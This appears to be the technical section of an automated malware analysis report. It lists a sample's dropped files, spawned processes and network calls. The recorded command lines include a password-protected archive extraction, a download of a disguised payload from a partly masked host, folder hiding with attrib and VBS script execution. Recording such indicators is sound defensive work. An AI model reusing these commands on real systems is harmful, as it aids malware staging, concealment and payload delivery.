Technical Information
- '%TEMP%\cache\stub.db' -pfafqw3rw34tgdrqwer4wgafs x C:\\hosts\update.rar C:\\hosts\
- '%TEMP%\cache\svcnost.dll' http://as###ton.wc.lt/server/image.jpg
- '%TEMP%\setup.exe' -pqewrfdhbgfjtjdt6ujedrsgt3fwsetg5e6hsdhjf
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\cache\setvbs.bat" "
- '<SYSTEM32>\attrib.exe' +h +s "C:\hosts"
- '<SYSTEM32>\wscript.exe' "%TEMP%\msg.vbs"
- '<SYSTEM32>\wscript.exe' "%TEMP%\cache\cache.vbs"
- %TEMP%\cache\setvbs.bat
- %TEMP%\cache\stub.db
- C:\hosts\update.rar
- %TEMP%\cache\image.jpg
- %TEMP%\setup.exe
- %TEMP%\msg.vbs
- %TEMP%\cache\cache.vbs
- %TEMP%\cache\svcnost.dll
- %TEMP%\cache\cache.vbs
- %TEMP%\cache\svcnost.dll
- 'as###ton.wc.lt':80
- as###ton.wc.lt/server/image.jpg
- DNS ASK as###ton.wc.lt
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: 'EDIT' WindowName: ''